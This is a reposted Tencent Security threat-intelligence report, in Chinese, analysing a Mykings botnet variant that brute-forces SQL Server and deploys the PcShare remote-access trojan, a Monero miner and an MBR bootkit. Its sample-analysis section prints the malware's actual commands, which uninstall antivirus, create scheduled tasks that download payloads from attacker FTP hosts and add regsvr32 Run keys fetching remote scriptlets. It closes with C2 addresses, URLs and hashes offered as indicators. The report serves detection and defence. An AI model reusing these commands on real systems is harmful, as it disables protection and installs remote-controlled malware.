Mykings僵尸网络新变种通过PcShare远程控制,已感染超5万台电脑挖矿

admin 2020年9月10日18:48:34评论225 views字数 8945阅读29分49秒阅读模式

Mykings僵尸网络新变种通过PcShare远程控制,已感染超5万台电脑挖矿

长按二维码关注

腾讯安全威胁情报中心



一、概述

腾讯安全威胁情报中心检测到Mykings挖矿僵尸网络变种木马,更新后的Mykings会在被感染系统安装开源远程控制木马PcShare,对受害电脑进行远程控制:可进行操作文件、服务、注册表、进程、窗口等多种资源,并且可以下载和执行指定的程序。

Mykings僵尸网络木马还会关闭Windows Defender、检测卸载常见杀毒软件;卸载竞品挖矿木马和旧版挖矿木马;下载“暗云”木马感染硬盘主引导记录(MBR)实现长期驻留;通过计划任务、添加启动项等实现开机自动运行等行为。

MyKings僵尸网络最早于2017年2月左右开始出现,该僵尸网络通过扫描互联网上 1433 及其他多个端口渗透进入受害者主机,然后传播包括DDoS、Proxy(代理服务)、RAT(远程控制木马)、Miner(挖矿木马)、暗云III在内的多种不同用途的恶意代码。由于MyKings僵尸网络主动扩散的能力较强,影响范围较广,对企业用户危害严重。根据门罗币钱包算力1000KH/s进行推测,Mykings僵尸网络目前已控制超过5万台电脑进行挖矿作业。

Mykings僵尸网络新变种通过PcShare远程控制,已感染超5万台电脑挖矿


腾讯安全系列产品已支持检测、清除Mykings僵尸网络的最新变种,具体响应清单如下:

应用

场景

安全产品

解决方案

腾讯T-Sec

威胁情报云查服务

(SaaS)

1)Mykings僵尸网络相关IOCs已入库。

各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics

腾讯T-Sec

高级威胁追溯系统

Mykings僵尸网络相关信息和情报已支持检索。

网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts

云原生安全

防护

云防火墙

(Cloud Firewall,CFW)

基于网络流量进行威胁检测与主动拦截,已支持:

1)Mykings僵尸网络关联的IOCs已支持识别检测;

2)通过协议特征检测主机挖矿行为;

3)SQL Server弱口令爆破登陆行为检测;

 

有关云防火墙的更多信息,可参考:
 https://cloud.tencent.com/product/cfw

腾讯T-Sec  主机安全

(Cloud Workload Protection,CWP)

1)已支持查杀Mykings僵尸网络相关木马程序;

2)云主机SQL Server弱口令风险项检测;

 

腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp

腾讯T-Sec 安全运营中心

基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。

关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html

非云企业安全防护

腾讯T-Sec

高级威胁检测系统

(腾讯御界)

1)已支持通过协议检测Mykings僵尸网络与服务器的网络通信

2)通过协议特征检测主机挖矿行为;

 

关于T-Sec高级威胁检测系统的更多信息,可参考:

https://cloud.tencent.com/product/nta

腾讯T-Sec终端安全管理系统(御点)

1)可查杀Mykings僵尸网络入侵释放的木马程序;

 

腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力,关于T-Sec终端安全管理系统的更多资料,可参考:https://s.tencent.com/product/yd/index.html

二、样本分析
mykings通过mssql爆破(1433端口)攻击windows服务器,爆破登陆成功后执行Powershell脚本power.txt。Power.txt首先关闭Windows Defender相关功能,然后下载kill.txt清除旧版挖矿程序。

Mykings僵尸网络新变种通过PcShare远程控制,已感染超5万台电脑挖矿


Kill.txt根据进程名匹配旧版挖矿程序,其中标记为“1”代表清除对应的WMI启动项,列表中Mykings常用进程名包括:
uihost64.exe、dhelper.exe、msinfo.exe、u.exe、lsmose.exe、lsmos.exe、lsmo.exe、csrw.exe、csrw.exe、lsmosee.exe、lsmma.exe、lsmm.exe、lsmmaa.exe、lsmma.exe、new.exe、upsupx.exe、lsma.exe、lsmab.exe、lsmaaa.exe、lsma30.exe、lsma31.exe

Mykings僵尸网络新变种通过PcShare远程控制,已感染超5万台电脑挖矿


删除旧版WMI事件过滤器“fuckyoumm2_filter”、消费者“fuckyoumm2_consumer”,从而删除WMI启动项。

Mykings僵尸网络新变种通过PcShare远程控制,已感染超5万台电脑挖矿

持久化

Power.txt接着下载uninstall.txt执行,完成卸载杀软、删除旧版挖矿木马、以及通过安装Windows计划任务、RUN启动项、WMI启动项进行本地持久化操作。

1

卸载杀毒软件

wmic.exe product where "name like '%Eset%'" call uninstall /nointeractivewmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractivewmic.exe product where "name like '%avast%'" call uninstall /nointeractivewmic.exe product where "name like '%avp%'" call uninstall /nointeractivewmic.exe product where "name like '%Security%'" call uninstall /nointeractivewmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractivewmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractivecmd /c "C:Progra1MalwarebytesAnti-Malwareunins000.exe" /verysilent /suppressmsgboxes /norestart

2

安装计划任务“oka

安装计划任务“oka”启动新版挖矿木马lsma12.exe,杀死进程java.exe;

schtasks /create /tn "oka" /tr "cmd /c start c:windowsinfaspnetlsma12.exe -p" /ru "system" /sc onstart /Fwmic.exe process where ExecutablePath='c:\windows\java\java.exe' call Terminate

3

安装计划任务"Mysa"、"Mysa2"

安装计划任务"Mysa"、"Mysa2",在每次系统启动时执行命令,使用账号test密码1433登陆FTP服务器ftp[.]ftp0930[.]host下载木马a1.exe和s1.rar并执行;

schtasks /create /tn "Mysa" /tr "cmd /c echo open ftp.ftp0930.host >secho test>>secho 1433>>secho binary>>secho get a1.exe c:windowsupdate.exe>>secho bye>>sftp -s:sc:windowsupdate.exe" /ru "system" /sc onstart /Fschtasks /create /tn "Mysa2" /tr "cmd /c echo open ftp.ftp0930.host>psecho test>>psecho 1433>>psecho get s1.rar c:windowshelplsmosee.exe>>psecho bye>>psftp -s:psc:windowshelplsmosee.exe" /ru "system" /sc onstart /F

4

设置拒绝”system"用户访问指定路径

设置拒绝“system”用户访问指定文件和路径;

cacls c:windowsjavajava.exe /e /d systemcacls c:windowstempservtestdos.dll /e /d systemcacls C:WINDOWSFontscd /e /d system

5

安装Run启动项,删除旧启动项

安装RUN启动项“start”负责下载执行脚本v1.sct,同时删除旧启动项“start1”,删除旧计划任务“Mysa3”、“ok”、“Mysa1”、“my1”。

reg add "HKLMSoftwareMicrosoftWindowsCurrentVersionRun" /v "start" /d "regsvr32 /u /s /i:http[:]//js.down0116.info:280/v1.sct scrobj.dll" /freg add "HKLMSoftwarewow6432nodeMicrosoftWindowsCurrentVersionRun" /v "start" /d "regsvr32 /u /s /i:http[:]//js.down0116.info:280/v1.sct scrobj.dll" /freg delete HKlmSoftwareMicrosoftWindowsCurrentVersionRun /v "start1" /fSCHTASKS /Delete /TN "Mysa3" /FSCHTASKS /Delete /TN "ok" /FSCHTASKS /Delete /TN "Mysa1" /FSCHTASKS /Delete /TN "my1" /F

6

删除旧版WMI启动项

继续删除旧版的名称为“coronav”(新冠)的WMI启动项,同时安装新版的“coronav”WMI启动项,在其中通过Powershell下载和执行以下脚本:
http[:]//ruisgood.ru/power.txt
http[:]//gamesoxalic.com/power.txt


或者通过regsvr32下载和执行脚本:
http[:]//ruisgood.ru/s.txt
http[:]//gamesoxalic.com/s.txt

Mykings僵尸网络新变种通过PcShare远程控制,已感染超5万台电脑挖矿

7

安装WMI启动项

安装WMI启动项“fuckamm3”、“fuckamm4”启动新版挖矿木马程序:

Mykings僵尸网络新变种通过PcShare远程控制,已感染超5万台电脑挖矿

8

下载门罗币挖矿程序、Mykings更新程序及暗云木马

Download.txt负责下载门罗币挖矿程序、Mykings更新程序和安装“暗云”木马感染程序:

Mykings僵尸网络新变种通过PcShare远程控制,已感染超5万台电脑挖矿

自更新

Download.txt下载的ups.dat为自解压程序,解压后释放多个文件到temp目录下,执行竞品挖矿木马清除、挖矿木马下载和启动,以及安装启动项等更新操作。释放的文件包括:
c:windowstempntuser.dat
c:windowstempupx.exe
%temp%c3.bat
%temp%excludes
%temp%n.vbs

Mykings僵尸网络新变种通过PcShare远程控制,已感染超5万台电脑挖矿

 

Mykings僵尸网络新变种通过PcShare远程控制,已感染超5万台电脑挖矿


Download.txt 下载的“暗云”木马max.rar会感染MBR执行shellcode,从云端获取Payload并最终获取Mykings相关木马文件。下载Payload网络流量如下:

Mykings僵尸网络新变种通过PcShare远程控制,已感染超5万台电脑挖矿


首先从C2服务器http[:]//95.214.9.95/pld/cmd.txt下载cmd.txt。

Mykings僵尸网络新变种通过PcShare远程控制,已感染超5万台电脑挖矿


然后向服务器(http[:]//95.214.9.95/pld/login.aspx?uid=***&info=***)发送上线信息,参数包括设备标识号uid和info,其中info包括计算机名、出口IP、CPU型号、CPU数量、内存大小信息,info数据经过base64编码,服务器接收数据后返回“AcceptOK”。

Mykings僵尸网络新变种通过PcShare远程控制,已感染超5万台电脑挖矿

PcShare远控木马

返回数据cmd.txt中指定下载的20200809.rar为PcShare开源远控木马,该木马在github上有多个版本https[:]//github.com/LiveMirror/pcshare。木马下载后被拷贝至:
c:windowsdebugitem.dat,启动命令为:

rundll32.exe c:windowsdebugitem.dat,ServiceMain aaaa

Mykings僵尸网络新变种通过PcShare远程控制,已感染超5万台电脑挖矿

 

Mykings僵尸网络新变种通过PcShare远程控制,已感染超5万台电脑挖矿


PcShare可根据服务端指令执行以下多种远控功能,该木马源代码在多个共享平台可供下载,黑客可以随意下载和重新修改编译。

  • 枚举、创建、重命名、删除文件和目录

  • 枚举和终止进程

  • 编辑注册表项和值

  • 枚举和修改服务

  • 枚举和控制窗口

  • 执行二进制文件

  • 从C&C或提供的URL下载其他文件

  • 将文件上传到C&C

  • 执行shell命令

  • 显示消息框

  • 重新启动或关闭系统

 

Mykings僵尸网络新变种通过PcShare远程控制,已感染超5万台电脑挖矿


PcShare连接C2服务器:192.187.111.66:5566。

Mykings僵尸网络新变种通过PcShare远程控制,已感染超5万台电脑挖矿

门罗币挖矿

Download.txt从地址http[:]//ruisgood.ru/1201.rar下载得到XMRig挖矿程序,从地址http[:]//ruisgood.ru/config2.json下载得到挖矿配置文件,然后启动挖矿进程:
c:windowsinfaspnetlsma12.exe


挖矿时使用矿池:xmr-eu1.nanopool.org:14444
门罗币钱包:
4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQo6GYsXhWxuSrS7Uka

Mykings僵尸网络新变种通过PcShare远程控制,已感染超5万台电脑挖矿


查询该钱包,已挖矿获得143个XMR,折合人民币8万余元。而其矿池算力平均为1000Kh/s(盈利100美元/天),可推算约5万台电脑被控制挖矿。

Mykings僵尸网络新变种通过PcShare远程控制,已感染超5万台电脑挖矿


IOCs
C&C
192.187.111.66:5566
95.214.9.95

Domain
ruisgood.ru
ftp.ftp0801.ru
gamesoxalic.com
ftp.ftp0930.host
js.down0116.info
js.mys2016.info
wmi.1217bye.host
js.5b6b7b.ru
up.mykings.pw
kriso.ru
f321y.com
down.f4321y.com

IP
199.168.100.74
173.247.239.186
174.128.235.243
223.25.247.152
167.88.180.175
139.5.177.10
173.247.239.186
185.239.227.82

URL
http[:]//ruisgood.ru/ups.dat
http[:]//ruisgood.ru/power.txt
http[:]//ruisgood.ru/1201.rar
http[:]//ruisgood.ru/uninstall.txt
http[:]//ruisgood.ru/max.rar
http[:]//ruisgood.ru/config2.json
http[:]//ruisgood.ru/s.txt
http[:]//ruisgood.ru/upx.exe
http[:]//ruisgood.ru/s.xsl
http[:]//ruisgood.ru/download2.txt
http[:]//ruisgood.ru/batpower.txt
http[:]//ruisgood.ru/ups.dat
http[:]//ruisgood.ru/download.txt
http[:]//ruisgood.ru/kill.txt
http[:]//ruisgood.ru/up.txt
http[:]//ruisgood.ru/wmi.txt
http[:]//ruisgood.ru/batpower.tx
http[:]//ruisgood.ru/up2.txt
http[:]//gamesoxalic.com/power.txt
http[:]//gamesoxalic.com/s.txt
ftp[:]//199.168.100.74/aa.exe
ftp[:]//199.168.100.74/1.dat
ftp[:]//ftp.ftp0801.ru/1.dat
ftp[:]//ftp.ftp0801.ru/aa.exe
ftp[:]//ftp.ftp0930.host/a1.exe
ftp[:]//ftp.ftp0930.host/s1.rar
http[:]//js.down0116.info:280/v1.sct
http[:]//174.128.235.243/wmi.txt
http[:]//174.128.235.243/upsupx2.exe
http[:]//174.128.235.243/u.exe
http[:]//199.168.100.74/20200809.rar
http[:]//199.168.100.74:8074/1201.rar
http[:]//173.247.239.186:9999/max.exe
http[:]//173.247.239.186:9999/u.exe
http[:]//185.239.227.82:8082/2.exe
http[:]//wmi.1217bye.host/S.ps1
http[:]//95.214.9.95/pld/cmd.txt
http[:]//223.25.247.152:8152/batpower.txt
http[:]//167.88.180.175:8175/kill.txt
http[:]//167.88.180.175:8175/uninstall.txt
http[:]//139.5.177.10:280/psa.jpg
http[:]//199.168.100.74/2.exe
http[:]//199.168.100.74:8074/2.exe
http[:]//173.247.239.186/2.exe
http[:]//185.239.227.82:8082/2.exe
http[:]//173.247.239.186:9999/2.exe
http[:]//js.5b6b7b.ru/v.sct
http[:]//js.5b6b7b.ru:280/v.sct
http[:]//up.mykings.pw/update.txt
http[:]//kriso.ru/java12.dat
http[:]//js.ftp0930.host/helloworld.msi
http[:]//f321y.com:8888/dhelper.dat
http[:]//down.f4321y.com:8888/kill.html


MD5

20200809.rar

dce4ac18798ea897cdc9e09e06b178be

max.rar

bc7fc83ce9762eb97dc28ed1b79a0a10

u.exe

d9c32681d65c18d9955f5db42154a0f3

ups.dat

d1f978c88023639d6325805eb562de8c

upsupx2.exe

b5cd8af63e35db23eb1c6a4eb8244c45

address.txt

83bdb3a6fb995788de262b22919524f1

cloud.txt

6b9b70f4e0c8885d12169045e906d698

cmd.txt

6def7a0c5707f24a912c79f6520ca86f

kill.txt

1573ab993edc98decc09423fd82ec5ed

micro

f0129d85b17ee4d29ef52c63e0e548a4

power.txt

5670f0839333e4b160be05177601b40c

uninstall.txt

6092899216610fea5c65e416b34c1777

update.txt

581a86fea2afeb9b9d6d04c9a8f0a5c1

wmi.txt

6afc95f60630a588a7826608c70a60c8

wpd.jpg

bbae338b0cac5a2d169b8c535f33bfa0

batpower.txt

40160c782c2a41eed8d8eaf0c706050a

up.txt

6c190a44db2118d9c07037d769e0a62d

ups.txt

f41a8a69361fccc13344493c04a4f0d8

s.ps1

966abd05b7ad1b0b89d2a846f8a5a8f2

testav.dat

d4f7a3f44ae3f21863b1440219388a5b

psa.jpg

9cb1c1a78ce3efe57eef5f128b43710a


门罗币钱包:
4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQo6GYsXhWxuSrS7Uka


参考链接:

https://www.freebuf.com/articles/193260.html
https://www.freebuf.com/articles/network/161286.html
https://blogs.blackberry.com/en/2019/09/pcshare-backdoor-attacks-targeting-windows-users-with-fakenarrator-malware

Mykings僵尸网络新变种通过PcShare远程控制,已感染超5万台电脑挖矿Mykings僵尸网络新变种通过PcShare远程控制,已感染超5万台电脑挖矿

Mykings僵尸网络新变种通过PcShare远程控制,已感染超5万台电脑挖矿


  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年9月10日18:48:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Mykings僵尸网络新变种通过PcShare远程控制,已感染超5万台电脑挖矿http://cn-sec.com/archives/126668.html

发表评论

匿名网友 填写信息